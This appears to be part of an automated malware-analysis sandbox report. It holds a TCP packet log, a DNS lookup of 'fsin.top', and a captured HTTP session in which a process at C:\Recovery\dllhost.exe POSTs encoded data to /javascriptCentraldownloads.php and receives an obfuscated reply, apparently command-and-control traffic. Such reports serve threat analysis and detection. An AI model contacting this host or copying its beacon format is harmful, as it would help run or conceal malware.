                                                  Aug 1, 2024 07:39:36.974755049 CEST4992080192.168.2.4172.67.203.2
                                                  Aug 1, 2024 07:39:37.020911932 CEST8049920172.67.203.2192.168.2.4
                                                  Aug 1, 2024 07:39:37.073223114 CEST8049920172.67.203.2192.168.2.4
                                                  Aug 1, 2024 07:39:37.115677118 CEST4992080192.168.2.4172.67.203.2
                                                  Aug 1, 2024 07:39:37.347706079 CEST8049920172.67.203.2192.168.2.4
                                                  Aug 1, 2024 07:39:37.473522902 CEST4992080192.168.2.4172.67.203.2
                                                  Aug 1, 2024 07:39:37.474148989 CEST4992180192.168.2.4172.67.203.2
                                                  Aug 1, 2024 07:39:37.479136944 CEST8049921172.67.203.2192.168.2.4
                                                  Aug 1, 2024 07:39:37.479172945 CEST8049920172.67.203.2192.168.2.4
                                                  Aug 1, 2024 07:39:37.479212046 CEST4992180192.168.2.4172.67.203.2
                                                  Aug 1, 2024 07:39:37.479245901 CEST4992080192.168.2.4172.67.203.2
                                                  Aug 1, 2024 07:39:37.479331017 CEST4992180192.168.2.4172.67.203.2
                                                  Aug 1, 2024 07:39:37.484163046 CEST8049921172.67.203.2192.168.2.4
                                                  Aug 1, 2024 07:39:37.834181070 CEST4992180192.168.2.4172.67.203.2
                                                  Aug 1, 2024 07:39:37.839206934 CEST8049921172.67.203.2192.168.2.4
                                                  Aug 1, 2024 07:39:37.935220003 CEST8049921172.67.203.2192.168.2.4
                                                  Aug 1, 2024 07:39:38.091902018 CEST8049921172.67.203.2192.168.2.4
                                                  Aug 1, 2024 07:39:38.091979980 CEST4992180192.168.2.4172.67.203.2
                                                  Aug 1, 2024 07:39:38.206362009 CEST4991980192.168.2.4172.67.203.2
                                                  Aug 1, 2024 07:39:38.206775904 CEST4992180192.168.2.4172.67.203.2
                                                  Aug 1, 2024 07:39:38.207309008 CEST4992280192.168.2.4172.67.203.2
                                                  Aug 1, 2024 07:39:38.212873936 CEST8049922172.67.203.2192.168.2.4
                                                  Aug 1, 2024 07:39:38.213062048 CEST4992280192.168.2.4172.67.203.2
                                                  Aug 1, 2024 07:39:38.213062048 CEST4992280192.168.2.4172.67.203.2
                                                  Aug 1, 2024 07:39:38.214592934 CEST8049921172.67.203.2192.168.2.4
                                                  Aug 1, 2024 07:39:38.214755058 CEST4992180192.168.2.4172.67.203.2
                                                  Aug 1, 2024 07:39:38.218170881 CEST8049922172.67.203.2192.168.2.4
                                                  Aug 1, 2024 07:39:38.568530083 CEST4992280192.168.2.4172.67.203.2
                                                  Aug 1, 2024 07:39:38.573529959 CEST8049922172.67.203.2192.168.2.4
                                                  Aug 1, 2024 07:39:38.686985016 CEST8049922172.67.203.2192.168.2.4
                                                  Aug 1, 2024 07:39:38.775192022 CEST4992280192.168.2.4172.67.203.2
                                                  Aug 1, 2024 07:39:38.924058914 CEST8049922172.67.203.2192.168.2.4
                                                  Aug 1, 2024 07:39:38.975188971 CEST4992280192.168.2.4172.67.203.2
                                                  Aug 1, 2024 07:39:39.037288904 CEST8049922172.67.203.2192.168.2.4
                                                  Aug 1, 2024 07:39:39.162221909 CEST4992280192.168.2.4172.67.203.2
                                                  Aug 1, 2024 07:39:39.195184946 CEST4992280192.168.2.4172.67.203.2
                                                  Aug 1, 2024 07:39:39.195482016 CEST4992380192.168.2.4172.67.203.2
                                                  Aug 1, 2024 07:39:39.200424910 CEST8049923172.67.203.2192.168.2.4
                                                  Aug 1, 2024 07:39:39.200460911 CEST8049922172.67.203.2192.168.2.4
                                                  Aug 1, 2024 07:39:39.203126907 CEST4992380192.168.2.4172.67.203.2
                                                  Aug 1, 2024 07:39:39.203129053 CEST4992280192.168.2.4172.67.203.2
                                                  Aug 1, 2024 07:39:39.203248978 CEST4992380192.168.2.4172.67.203.2
                                                  Aug 1, 2024 07:39:39.208059072 CEST8049923172.67.203.2192.168.2.4
                                                  Aug 1, 2024 07:39:39.553214073 CEST4992380192.168.2.4172.67.203.2
                                                  Aug 1, 2024 07:39:39.561279058 CEST8049923172.67.203.2192.168.2.4
                                                  Aug 1, 2024 07:39:39.659400940 CEST8049923172.67.203.2192.168.2.4
                                                  Aug 1, 2024 07:39:39.818378925 CEST4992380192.168.2.4172.67.203.2
                                                  Aug 1, 2024 07:39:39.920839071 CEST8049923172.67.203.2192.168.2.4
                                                  Aug 1, 2024 07:39:40.005877972 CEST4992380192.168.2.4172.67.203.2
                                                  Aug 1, 2024 07:39:40.035881042 CEST4992380192.168.2.4172.67.203.2
                                                  Aug 1, 2024 07:39:40.036621094 CEST4992480192.168.2.4172.67.203.2
                                                  Aug 1, 2024 07:39:40.042073965 CEST8049924172.67.203.2192.168.2.4
                                                  Aug 1, 2024 07:39:40.042159081 CEST4992480192.168.2.4172.67.203.2
                                                  Aug 1, 2024 07:39:40.042268991 CEST4992480192.168.2.4172.67.203.2
                                                  Aug 1, 2024 07:39:40.042514086 CEST8049923172.67.203.2192.168.2.4
                                                  Aug 1, 2024 07:39:40.042572975 CEST4992380192.168.2.4172.67.203.2
                                                  Aug 1, 2024 07:39:40.048532009 CEST8049924172.67.203.2192.168.2.4
                                                  Aug 1, 2024 07:39:40.399087906 CEST4992480192.168.2.4172.67.203.2
                                                  Aug 1, 2024 07:39:40.404202938 CEST8049924172.67.203.2192.168.2.4
                                                  Aug 1, 2024 07:39:40.490561962 CEST8049924172.67.203.2192.168.2.4
                                                  Aug 1, 2024 07:39:40.595422029 CEST4992480192.168.2.4172.67.203.2
                                                  Aug 1, 2024 07:39:40.648502111 CEST8049924172.67.203.2192.168.2.4
                                                  Aug 1, 2024 07:39:40.725709915 CEST4992480192.168.2.4172.67.203.2
                                                  Aug 1, 2024 07:39:40.725716114 CEST4992580192.168.2.4172.67.203.2
                                                  Aug 1, 2024 07:39:40.731544018 CEST8049925172.67.203.2192.168.2.4
                                                  Aug 1, 2024 07:39:40.731673002 CEST4992580192.168.2.4172.67.203.2
                                                  Aug 1, 2024 07:39:40.731812000 CEST4992580192.168.2.4172.67.203.2
                                                  Aug 1, 2024 07:39:40.732009888 CEST8049924172.67.203.2192.168.2.4
                                                  Aug 1, 2024 07:39:40.732073069 CEST4992480192.168.2.4172.67.203.2
                                                  Aug 1, 2024 07:39:40.738055944 CEST8049925172.67.203.2192.168.2.4
                                                  Aug 1, 2024 07:39:40.768738985 CEST4992680192.168.2.4172.67.203.2
                                                  Aug 1, 2024 07:39:40.768738985 CEST4992580192.168.2.4172.67.203.2
                                                  Aug 1, 2024 07:39:40.773711920 CEST8049926172.67.203.2192.168.2.4
                                                  Aug 1, 2024 07:39:40.773833990 CEST4992680192.168.2.4172.67.203.2
                                                  Aug 1, 2024 07:39:40.773910999 CEST4992680192.168.2.4172.67.203.2
                                                  Aug 1, 2024 07:39:40.779011011 CEST8049926172.67.203.2192.168.2.4
                                                  Aug 1, 2024 07:39:40.813926935 CEST8049925172.67.203.2192.168.2.4
                                                  Aug 1, 2024 07:39:41.111928940 CEST8049925172.67.203.2192.168.2.4
                                                  Aug 1, 2024 07:39:41.112046957 CEST4992580192.168.2.4172.67.203.2
                                                  Aug 1, 2024 07:39:41.131031990 CEST4992680192.168.2.4172.67.203.2
                                                  Aug 1, 2024 07:39:41.135993958 CEST8049926172.67.203.2192.168.2.4
                                                  Aug 1, 2024 07:39:41.219861984 CEST8049926172.67.203.2192.168.2.4
                                                  Aug 1, 2024 07:39:41.318362951 CEST4992680192.168.2.4172.67.203.2
                                                  Aug 1, 2024 07:39:41.384154081 CEST8049926172.67.203.2192.168.2.4
                                                  Aug 1, 2024 07:39:41.505852938 CEST4992680192.168.2.4172.67.203.2
                                                  Aug 1, 2024 07:39:41.554912090 CEST4992680192.168.2.4172.67.203.2
                                                  Aug 1, 2024 07:39:41.555610895 CEST4992780192.168.2.4172.67.203.2
                                                  Aug 1, 2024 07:39:41.561455011 CEST8049926172.67.203.2192.168.2.4
                                                  Aug 1, 2024 07:39:41.561490059 CEST8049927172.67.203.2192.168.2.4
                                                  Aug 1, 2024 07:39:41.561516047 CEST4992680192.168.2.4172.67.203.2
                                                  Aug 1, 2024 07:39:41.561561108 CEST4992780192.168.2.4172.67.203.2
                                                  Aug 1, 2024 07:39:41.561636925 CEST4992780192.168.2.4172.67.203.2
                                                  Aug 1, 2024 07:39:41.566468954 CEST8049927172.67.203.2192.168.2.4
                                                  Aug 1, 2024 07:39:41.912280083 CEST4992780192.168.2.4172.67.203.2
                                                  Aug 1, 2024 07:39:41.917253971 CEST8049927172.67.203.2192.168.2.4
                                                  Aug 1, 2024 07:39:42.068378925 CEST8049927172.67.203.2192.168.2.4
                                                  Aug 1, 2024 07:39:42.234241962 CEST8049927172.67.203.2192.168.2.4
                                                  Aug 1, 2024 07:39:42.234323025 CEST4992780192.168.2.4172.67.203.2
                                                  Aug 1, 2024 07:39:42.360016108 CEST4992780192.168.2.4172.67.203.2
                                                  Aug 1, 2024 07:39:42.363071918 CEST4992880192.168.2.4172.67.203.2
                                                  Aug 1, 2024 07:39:42.366017103 CEST8049927172.67.203.2192.168.2.4
                                                  Aug 1, 2024 07:39:42.366362095 CEST4992780192.168.2.4172.67.203.2
                                                  Aug 1, 2024 07:39:42.367934942 CEST8049928172.67.203.2192.168.2.4
                                                  Aug 1, 2024 07:39:42.371149063 CEST4992880192.168.2.4172.67.203.2
                                                  Aug 1, 2024 07:39:42.371292114 CEST4992880192.168.2.4172.67.203.2
                                                  Aug 1, 2024 07:39:42.376152039 CEST8049928172.67.203.2192.168.2.4
                                                  Aug 1, 2024 07:39:42.724666119 CEST4992880192.168.2.4172.67.203.2
                                                  Aug 1, 2024 07:39:42.729764938 CEST8049928172.67.203.2192.168.2.4
                                                  Aug 1, 2024 07:39:42.820812941 CEST8049928172.67.203.2192.168.2.4
                                                  Aug 1, 2024 07:39:42.972367048 CEST8049928172.67.203.2192.168.2.4
                                                  Aug 1, 2024 07:39:42.972469091 CEST4992880192.168.2.4172.67.203.2
                                                  Aug 1, 2024 07:39:43.092643976 CEST4992880192.168.2.4172.67.203.2
                                                  Aug 1, 2024 07:39:43.093179941 CEST4992980192.168.2.4172.67.203.2
                                                  Aug 1, 2024 07:39:43.098041058 CEST8049929172.67.203.2192.168.2.4
                                                  Aug 1, 2024 07:39:43.098313093 CEST8049928172.67.203.2192.168.2.4
                                                  Aug 1, 2024 07:39:43.098403931 CEST4992880192.168.2.4172.67.203.2
                                                  Aug 1, 2024 07:39:43.098404884 CEST4992980192.168.2.4172.67.203.2
                                                  Aug 1, 2024 07:39:43.098493099 CEST4992980192.168.2.4172.67.203.2
                                                  Aug 1, 2024 07:39:43.106970072 CEST8049929172.67.203.2192.168.2.4
                                                  Aug 1, 2024 07:39:43.443551064 CEST4992980192.168.2.4172.67.203.2
                                                  Aug 1, 2024 07:39:43.448648930 CEST8049929172.67.203.2192.168.2.4
                                                  Aug 1, 2024 07:39:43.567854881 CEST8049929172.67.203.2192.168.2.4
                                                  Aug 1, 2024 07:39:43.629636049 CEST4992980192.168.2.4172.67.203.2
                                                  Aug 1, 2024 07:39:43.719347954 CEST8049929172.67.203.2192.168.2.4
                                                  Aug 1, 2024 07:39:43.847898006 CEST4992980192.168.2.4172.67.203.2
                                                  Aug 1, 2024 07:39:43.848819017 CEST4993080192.168.2.4172.67.203.2
                                                  Aug 1, 2024 07:39:43.853229046 CEST8049929172.67.203.2192.168.2.4
                                                  Aug 1, 2024 07:39:43.853290081 CEST4992980192.168.2.4172.67.203.2
                                                  Aug 1, 2024 07:39:43.853749990 CEST8049930172.67.203.2192.168.2.4
                                                  Aug 1, 2024 07:39:43.853806019 CEST4993080192.168.2.4172.67.203.2
                                                  Aug 1, 2024 07:39:43.854809999 CEST4993080192.168.2.4172.67.203.2
                                                  Aug 1, 2024 07:39:43.856132984 CEST4988980192.168.2.4172.67.203.2
                                                  Aug 1, 2024 07:39:43.859795094 CEST8049930172.67.203.2192.168.2.4
                                                  Aug 1, 2024 07:39:44.209014893 CEST4993080192.168.2.4172.67.203.2
                                                  Aug 1, 2024 07:39:44.213999987 CEST8049930172.67.203.2192.168.2.4
                                                  Aug 1, 2024 07:39:44.311223030 CEST8049930172.67.203.2192.168.2.4
                                                  Aug 1, 2024 07:39:44.475075960 CEST4993080192.168.2.4172.67.203.2
                                                  Aug 1, 2024 07:39:44.534266949 CEST8049930172.67.203.2192.168.2.4
                                                  Aug 1, 2024 07:39:44.655891895 CEST4993080192.168.2.4172.67.203.2
                                                  Aug 1, 2024 07:39:44.655896902 CEST4993180192.168.2.4172.67.203.2
                                                  Aug 1, 2024 07:39:44.660814047 CEST8049931172.67.203.2192.168.2.4
                                                  Aug 1, 2024 07:39:44.660923958 CEST4993180192.168.2.4172.67.203.2
                                                  Aug 1, 2024 07:39:44.661014080 CEST4993180192.168.2.4172.67.203.2
                                                  Aug 1, 2024 07:39:44.661200047 CEST8049930172.67.203.2192.168.2.4
                                                  Aug 1, 2024 07:39:44.661400080 CEST4993080192.168.2.4172.67.203.2
                                                  Aug 1, 2024 07:39:44.665888071 CEST8049931172.67.203.2192.168.2.4
                                                  Aug 1, 2024 07:39:45.005888939 CEST4993180192.168.2.4172.67.203.2
                                                  Aug 1, 2024 07:39:45.011234045 CEST8049931172.67.203.2192.168.2.4
                                                  Aug 1, 2024 07:39:45.106080055 CEST8049931172.67.203.2192.168.2.4
                                                  Aug 1, 2024 07:39:45.318351030 CEST4993180192.168.2.4172.67.203.2
                                                  Aug 1, 2024 07:39:45.321918011 CEST8049931172.67.203.2192.168.2.4
                                                  Aug 1, 2024 07:39:45.321973085 CEST4993180192.168.2.4172.67.203.2
                                                  Aug 1, 2024 07:39:45.358680964 CEST8049931172.67.203.2192.168.2.4
                                                  Aug 1, 2024 07:39:45.473309994 CEST4993180192.168.2.4172.67.203.2
                                                  Aug 1, 2024 07:39:45.473901033 CEST4993280192.168.2.4172.67.203.2
                                                  Aug 1, 2024 07:39:45.478545904 CEST8049931172.67.203.2192.168.2.4
                                                  Aug 1, 2024 07:39:45.478601933 CEST4993180192.168.2.4172.67.203.2
                                                  Aug 1, 2024 07:39:45.478708982 CEST8049932172.67.203.2192.168.2.4
                                                  Aug 1, 2024 07:39:45.478770018 CEST4993280192.168.2.4172.67.203.2
                                                  Aug 1, 2024 07:39:45.478862047 CEST4993280192.168.2.4172.67.203.2
                                                  Aug 1, 2024 07:39:45.483707905 CEST8049932172.67.203.2192.168.2.4
                                                  Aug 1, 2024 07:39:45.788429976 CEST4993380192.168.2.4172.67.203.2
                                                  Aug 1, 2024 07:39:45.788480043 CEST4993280192.168.2.4172.67.203.2
                                                  Aug 1, 2024 07:39:45.793397903 CEST8049933172.67.203.2192.168.2.4
                                                  Aug 1, 2024 07:39:45.793463945 CEST4993380192.168.2.4172.67.203.2
                                                  Aug 1, 2024 07:39:45.793543100 CEST4993380192.168.2.4172.67.203.2
                                                  Aug 1, 2024 07:39:45.800761938 CEST8049933172.67.203.2192.168.2.4
                                                  Aug 1, 2024 07:39:45.834289074 CEST8049932172.67.203.2192.168.2.4
                                                  Aug 1, 2024 07:39:45.834594965 CEST8049932172.67.203.2192.168.2.4
                                                  Aug 1, 2024 07:39:45.834642887 CEST4993280192.168.2.4172.67.203.2
                                                  Aug 1, 2024 07:39:45.938880920 CEST4993480192.168.2.4172.67.203.2
                                                  Aug 1, 2024 07:39:45.943813086 CEST8049934172.67.203.2192.168.2.4
                                                  Aug 1, 2024 07:39:45.943881035 CEST4993480192.168.2.4172.67.203.2
                                                  Aug 1, 2024 07:39:45.943980932 CEST4993480192.168.2.4172.67.203.2
                                                  Aug 1, 2024 07:39:45.948779106 CEST8049934172.67.203.2192.168.2.4
                                                  Aug 1, 2024 07:39:46.146708965 CEST4993380192.168.2.4172.67.203.2
                                                  Aug 1, 2024 07:39:46.151732922 CEST8049933172.67.203.2192.168.2.4
                                                  Aug 1, 2024 07:39:46.151869059 CEST8049933172.67.203.2192.168.2.4
                                                  Aug 1, 2024 07:39:46.246851921 CEST8049933172.67.203.2192.168.2.4
                                                  Aug 1, 2024 07:39:46.302835941 CEST4993480192.168.2.4172.67.203.2
                                                  Aug 1, 2024 07:39:46.307769060 CEST8049934172.67.203.2192.168.2.4
                                                  Aug 1, 2024 07:39:46.321218967 CEST4993380192.168.2.4172.67.203.2
                                                  Aug 1, 2024 07:39:46.419001102 CEST8049933172.67.203.2192.168.2.4
                                                  Aug 1, 2024 07:39:46.423161983 CEST8049934172.67.203.2192.168.2.4
                                                  Aug 1, 2024 07:39:46.505949974 CEST4993380192.168.2.4172.67.203.2
                                                  Aug 1, 2024 07:39:46.505949974 CEST4993480192.168.2.4172.67.203.2
                                                  Aug 1, 2024 07:39:46.665746927 CEST8049934172.67.203.2192.168.2.4
                                                  Aug 1, 2024 07:39:46.780546904 CEST4993380192.168.2.4172.67.203.2
                                                  Aug 1, 2024 07:39:46.780720949 CEST4993480192.168.2.4172.67.203.2
                                                  Aug 1, 2024 07:39:46.781519890 CEST4993580192.168.2.4172.67.203.2
                                                  Aug 1, 2024 07:39:46.785758018 CEST8049933172.67.203.2192.168.2.4
                                                  Aug 1, 2024 07:39:46.786166906 CEST4993380192.168.2.4172.67.203.2
                                                  Aug 1, 2024 07:39:46.786231041 CEST8049934172.67.203.2192.168.2.4
                                                  Aug 1, 2024 07:39:46.786298037 CEST4993480192.168.2.4172.67.203.2
                                                  Aug 1, 2024 07:39:46.786442041 CEST8049935172.67.203.2192.168.2.4
                                                  Aug 1, 2024 07:39:46.786593914 CEST4993580192.168.2.4172.67.203.2
                                                  Aug 1, 2024 07:39:46.786731005 CEST4993580192.168.2.4172.67.203.2
                                                  Aug 1, 2024 07:39:46.791763067 CEST8049935172.67.203.2192.168.2.4
                                                  Aug 1, 2024 07:39:47.131083012 CEST4993580192.168.2.4172.67.203.2
                                                  Aug 1, 2024 07:39:47.136164904 CEST8049935172.67.203.2192.168.2.4
                                                  Aug 1, 2024 07:39:47.250185966 CEST8049935172.67.203.2192.168.2.4
                                                  Aug 1, 2024 07:39:47.407335043 CEST4993580192.168.2.4172.67.203.2
                                                  Aug 1, 2024 07:39:47.503874063 CEST8049935172.67.203.2192.168.2.4
                                                  Aug 1, 2024 07:39:47.626895905 CEST4993580192.168.2.4172.67.203.2
                                                  Aug 1, 2024 07:39:47.631686926 CEST4993580192.168.2.4172.67.203.2
                                                  Aug 1, 2024 07:39:47.632474899 CEST4993680192.168.2.4172.67.203.2
                                                  Aug 1, 2024 07:39:47.636884928 CEST8049935172.67.203.2192.168.2.4
                                                  Aug 1, 2024 07:39:47.636945009 CEST4993580192.168.2.4172.67.203.2
                                                  Aug 1, 2024 07:39:47.637382030 CEST8049936172.67.203.2192.168.2.4
                                                  Aug 1, 2024 07:39:47.637450933 CEST4993680192.168.2.4172.67.203.2
                                                  Aug 1, 2024 07:39:47.637558937 CEST4993680192.168.2.4172.67.203.2
                                                  Aug 1, 2024 07:39:47.642399073 CEST8049936172.67.203.2192.168.2.4
                                                  Aug 1, 2024 07:39:47.991379976 CEST4993680192.168.2.4172.67.203.2
                                                  Aug 1, 2024 07:39:47.996282101 CEST8049936172.67.203.2192.168.2.4
                                                  Aug 1, 2024 07:39:48.100724936 CEST8049936172.67.203.2192.168.2.4
                                                  Aug 1, 2024 07:39:48.273375034 CEST4993680192.168.2.4172.67.203.2
                                                  Aug 1, 2024 07:39:48.309448957 CEST8049936172.67.203.2192.168.2.4
                                                  Aug 1, 2024 07:39:48.441790104 CEST4993780192.168.2.4172.67.203.2
                                                  Aug 1, 2024 07:39:48.446789980 CEST8049937172.67.203.2192.168.2.4
                                                  Aug 1, 2024 07:39:48.449337959 CEST4993780192.168.2.4172.67.203.2
                                                  Aug 1, 2024 07:39:48.449511051 CEST4993780192.168.2.4172.67.203.2
                                                  Aug 1, 2024 07:39:48.454344034 CEST8049937172.67.203.2192.168.2.4
                                                  Aug 1, 2024 07:39:48.478231907 CEST4993680192.168.2.4172.67.203.2
                                                  Aug 1, 2024 07:39:48.805413961 CEST4993780192.168.2.4172.67.203.2
                                                  Aug 1, 2024 07:39:48.810446024 CEST8049937172.67.203.2192.168.2.4
                                                  Aug 1, 2024 07:39:48.893337011 CEST8049937172.67.203.2192.168.2.4
                                                  Aug 1, 2024 07:39:49.007433891 CEST4993780192.168.2.4172.67.203.2
                                                  Aug 1, 2024 07:39:49.126976967 CEST8049937172.67.203.2192.168.2.4
                                                  Aug 1, 2024 07:39:49.250734091 CEST4993780192.168.2.4172.67.203.2
                                                  Aug 1, 2024 07:39:49.251518965 CEST4993880192.168.2.4172.67.203.2
                                                  Aug 1, 2024 07:39:49.256220102 CEST8049937172.67.203.2192.168.2.4
                                                  Aug 1, 2024 07:39:49.256299019 CEST4993780192.168.2.4172.67.203.2
                                                  Aug 1, 2024 07:39:49.256311893 CEST8049938172.67.203.2192.168.2.4
                                                  Aug 1, 2024 07:39:49.256460905 CEST4993880192.168.2.4172.67.203.2
                                                  Aug 1, 2024 07:39:49.256510973 CEST4993880192.168.2.4172.67.203.2
                                                  Aug 1, 2024 07:39:49.261269093 CEST8049938172.67.203.2192.168.2.4
                                                  Aug 1, 2024 07:39:49.615384102 CEST4993880192.168.2.4172.67.203.2
                                                  Aug 1, 2024 07:39:49.620294094 CEST8049938172.67.203.2192.168.2.4
                                                  Aug 1, 2024 07:39:49.701297045 CEST8049938172.67.203.2192.168.2.4
                                                  Aug 1, 2024 07:39:49.818382025 CEST4993880192.168.2.4172.67.203.2
                                                  Aug 1, 2024 07:39:49.925084114 CEST8049938172.67.203.2192.168.2.4
                                                  Aug 1, 2024 07:39:50.005876064 CEST4993880192.168.2.4172.67.203.2
                                                  Aug 1, 2024 07:39:50.051364899 CEST4993880192.168.2.4172.67.203.2
                                                  Aug 1, 2024 07:39:50.051687002 CEST4993980192.168.2.4172.67.203.2
                                                  Aug 1, 2024 07:39:50.056468010 CEST8049939172.67.203.2192.168.2.4
                                                  Aug 1, 2024 07:39:50.056510925 CEST8049938172.67.203.2192.168.2.4
                                                  Aug 1, 2024 07:39:50.056593895 CEST4993880192.168.2.4172.67.203.2
                                                  Aug 1, 2024 07:39:50.056662083 CEST4993980192.168.2.4172.67.203.2
                                                  Aug 1, 2024 07:39:50.056662083 CEST4993980192.168.2.4172.67.203.2
                                                  Aug 1, 2024 07:39:50.061449051 CEST8049939172.67.203.2192.168.2.4
                                                  Aug 1, 2024 07:39:50.413471937 CEST4993980192.168.2.4172.67.203.2
                                                  Aug 1, 2024 07:39:50.418513060 CEST8049939172.67.203.2192.168.2.4
                                                  Aug 1, 2024 07:39:50.500636101 CEST8049939172.67.203.2192.168.2.4
                                                  Aug 1, 2024 07:39:50.654736996 CEST8049939172.67.203.2192.168.2.4
                                                  Aug 1, 2024 07:39:50.657793045 CEST4993980192.168.2.4172.67.203.2
                                                  Aug 1, 2024 07:39:50.780699015 CEST4993980192.168.2.4172.67.203.2
                                                  Aug 1, 2024 07:39:50.781898975 CEST4994080192.168.2.4172.67.203.2
                                                  Aug 1, 2024 07:39:50.786639929 CEST8049939172.67.203.2192.168.2.4
                                                  Aug 1, 2024 07:39:50.786688089 CEST8049940172.67.203.2192.168.2.4
                                                  Aug 1, 2024 07:39:50.786786079 CEST4994080192.168.2.4172.67.203.2
                                                  Aug 1, 2024 07:39:50.786874056 CEST4993980192.168.2.4172.67.203.2
                                                  Aug 1, 2024 07:39:50.786875963 CEST4994080192.168.2.4172.67.203.2
                                                  Aug 1, 2024 07:39:50.791644096 CEST8049940172.67.203.2192.168.2.4
                                                  Aug 1, 2024 07:39:51.131036043 CEST4994080192.168.2.4172.67.203.2
                                                  Aug 1, 2024 07:39:51.136137009 CEST8049940172.67.203.2192.168.2.4
                                                  Aug 1, 2024 07:39:51.230019093 CEST8049940172.67.203.2192.168.2.4
                                                  Aug 1, 2024 07:39:51.318521976 CEST4994080192.168.2.4172.67.203.2
                                                  Aug 1, 2024 07:39:51.389648914 CEST8049940172.67.203.2192.168.2.4
                                                  Aug 1, 2024 07:39:51.429403067 CEST4994180192.168.2.4172.67.203.2
                                                  Aug 1, 2024 07:39:51.434322119 CEST8049941172.67.203.2192.168.2.4
                                                  Aug 1, 2024 07:39:51.434385061 CEST4994180192.168.2.4172.67.203.2
                                                  Aug 1, 2024 07:39:51.434504986 CEST4994180192.168.2.4172.67.203.2
                                                  Aug 1, 2024 07:39:51.439313889 CEST8049941172.67.203.2192.168.2.4
                                                  Aug 1, 2024 07:39:51.475550890 CEST8049940172.67.203.2192.168.2.4
                                                  Aug 1, 2024 07:39:51.475718975 CEST4994080192.168.2.4172.67.203.2
                                                  Aug 1, 2024 07:39:51.475740910 CEST4994180192.168.2.4172.67.203.2
                                                  Aug 1, 2024 07:39:51.521862984 CEST8049941172.67.203.2192.168.2.4
                                                  Aug 1, 2024 07:39:51.797831059 CEST8049941172.67.203.2192.168.2.4
                                                  Aug 1, 2024 07:39:51.797920942 CEST4994180192.168.2.4172.67.203.2

                                                  UDP Packets

                                                  TimestampSource PortDest PortSource IPDest IP
                                                  Aug 1, 2024 07:37:24.658624887 CEST5419753192.168.2.41.1.1.1
                                                  Aug 1, 2024 07:37:25.096748114 CEST53541971.1.1.1192.168.2.4

                                                  DNS Queries

                                                  TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                  Aug 1, 2024 07:37:24.658624887 CEST192.168.2.41.1.1.10x587fStandard query (0)fsin.topA (IP address)IN (0x0001)false

                                                  DNS Answers

                                                  TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                  Aug 1, 2024 07:37:25.096748114 CEST1.1.1.1192.168.2.40x587fNo error (0)fsin.top172.67.203.2A (IP address)IN (0x0001)false
                                                  Aug 1, 2024 07:37:25.096748114 CEST1.1.1.1192.168.2.40x587fNo error (0)fsin.top104.21.90.175A (IP address)IN (0x0001)false

                                                  HTTP Request Dependency Graph

                                                  • fsin.top

                                                  HTTP Packets

                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                  0192.168.2.449730172.67.203.2807288C:\Recovery\dllhost.exe
                                                  TimestampBytes transferredDirectionData
                                                  Aug 1, 2024 07:37:25.244874001 CEST273OUTPOST /javascriptCentraldownloads.php HTTP/1.1
                                                  Content-Type: application/x-www-form-urlencoded
                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0
                                                  Host: fsin.top
                                                  Content-Length: 344
                                                  Expect: 100-continue
                                                  Connection: Keep-Alive
                                                  Aug 1, 2024 07:37:25.600461960 CEST344OUTData Raw: 00 06 01 00 06 00 01 05 05 06 02 01 02 07 01 05 00 0a 05 0c 02 00 03 0b 00 53 0c 07 06 0e 03 54 0e 05 07 0a 02 02 06 0b 0f 00 06 0b 06 02 06 07 06 53 0f 0a 0c 04 01 04 01 01 06 00 05 0a 05 5a 01 00 0d 5e 07 54 06 51 0f 01 0e 54 0d 56 0d 05 07 02
                                                  Data Ascii: STSZ^TQTVYPP\L~Ncz`r^wu^~|qBtt|]ZK{B^[lYvJ|CkUw^o^je~V@A{S\~r}
                                                  Aug 1, 2024 07:37:25.720122099 CEST25INHTTP/1.1 100 Continue
                                                  Aug 1, 2024 07:37:25.988699913 CEST1236INHTTP/1.1 200 OK
                                                  Date: Thu, 01 Aug 2024 05:37:25 GMT
                                                  Content-Type: text/html; charset=UTF-8
                                                  Transfer-Encoding: chunked
                                                  Connection: keep-alive
                                                  CF-Cache-Status: DYNAMIC
                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=FAzA6LbCMQ%2FgdrUOpLVcAabZDR6DuwqNo%2BLDpUg%2BgzOCseu7jq6tn1KW0K2Q3X7RsDUZuNMSIpx9oPiAzC%2BuKHnT1VvDX6Hctz%2FaS%2BQHLkhH7va2pBzP%2BueFAA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                  Server: cloudflare
                                                  CF-RAY: 8ac379e76fc643cb-EWR
                                                  alt-svc: h2=":443"; ma=60
                                                  Data Raw: 35 35 34 0d 0a 56 4a 7d 59 6f 7d 63 49 78 72 77 5b 7c 07 78 5a 7d 59 60 50 7e 73 62 55 6e 5d 7c 06 7d 4c 73 5d 63 70 62 50 6e 5f 61 01 76 5f 64 02 6a 5b 78 01 55 4b 71 4f 74 4c 77 06 68 72 7d 00 68 77 69 53 6c 58 5a 0c 7c 70 7f 04 76 5c 71 03 63 62 6a 5a 7f 72 76 02 7f 7c 5e 0c 7d 74 64 5a 75 4c 7b 06 7c 5c 79 02 7e 4e 72 59 7b 77 60 4d 6c 59 7c 4c 78 53 70 5b 6d 5c 59 5b 6c 63 7d 5b 7f 5e 74 03 78 74 7c 01 6a 5b 73 07 61 61 70 03 7a 51 41 5b 6b 64 77 50 7c 61 66 52 77 7c 52 41 7a 6f 63 5c 77 60 75 52 6d 61 53 03 7e 52 71 5b 6c 61 7d 5a 61 4d 5e 5a 61 5f 7f 5b 63 62 6e 50 7e 5d 7a 06 74 72 6e 5f 76 66 6c 09 6b 7c 66 58 77 6f 7c 04 7e 60 7c 02 78 6f 63 03 6c 06 76 44 6b 6d 6b 51 77 49 6c 07 7e 62 71 50 7e 53 6c 51 78 43 66 4e 7f 72 79 06 7b 5d 46 51 6b 0a 73 50 7e 63 74 40 7e 64 79 5d 6c 6d 5a 58 7b 04 67 58 7c 5f 7b 02 7e 77 73 0b 7f 4e 53 42 7b 63 74 4c 7e 62 70 05 77 73 65 51 7b 5c 79 03 75 48 60 45 7d 76 7c 02 7d 58 53 0c 76 72 73 01 7f 62 79 42 7f 67 62 0a 78 58 68 0d 7e 5d 63 00 75 62 75 07 76 [TRUNCATED]
